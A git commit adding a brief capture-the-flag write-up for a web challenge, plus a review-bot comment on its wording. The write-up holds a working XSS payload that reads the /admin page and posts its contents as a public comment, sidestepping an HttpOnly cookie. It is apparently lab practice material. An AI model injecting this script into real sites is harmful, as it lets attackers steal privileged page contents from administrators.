author | Aria <me@aria.rip> | 2023-10-01 17:23:09 +0100 |
---|---|---|
committer | Aria <me@aria.rip> | 2023-10-01 17:23:09 +0100 |
commit | b5b9cf7a1f61d004d7d53584d029c19302c63ba0 (patch) | |
tree | 49c3022dccf669f9f2b905ddfbd2d16db2d10d84 /punkctf/web_03.md |
initial commit
Diffstat (limited to 'punkctf/web_03.md')
-rw-r--r-- | punkctf/web_03.md | 15 |
1 files changed, 15 insertions, 0 deletions
diff --git a/punkctf/web_03.md b/punkctf/web_03.md new file mode 100644 index 0000000..a1d2e1e --- /dev/null +++ b/punkctf/web_03.md @@ -0,0 +1,15 @@ + +The cookie is HttpOnly now, but we only care about the contents of `/admin`, not the cookie, so we can use the same payload for `Subdomain Takeover - Easy`, but without doing the subdomain takeover. + +``` +fetch('/admin').then(r => r.text()).then(d => { + let data = new URLSearchParams(); + data.append('name', 'admin page'); + data.append('comment', d); + fetch('/new-comment', { + method: 'POST', + headers: { "Content-Type": "application/x-www-form-urlencoded" }, + body: data, + }); +}) +``` |
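Review bot: the opening sentence of the new web_03.md says the same payload can be used "for `Subdomain Takeover - Easy`", which reads as if this payload targets that other challenge; "the same payload as in `Subdomain Takeover - Easy`" would match the rest of the sentence. The write-up also says the HttpOnly flag does not matter without saying why. One more sentence would make the lesson explicit: the script runs in the page's own origin, so the browser attaches the session cookie to `fetch('/admin')` even though script cannot read the cookie itself, which means HttpOnly limits cookie theft but not same-origin requests made on the admin's behalf. The code fence has no language tag; tagging it as `js` would give syntax highlighting and keep it consistent with a rendered markdown write-up.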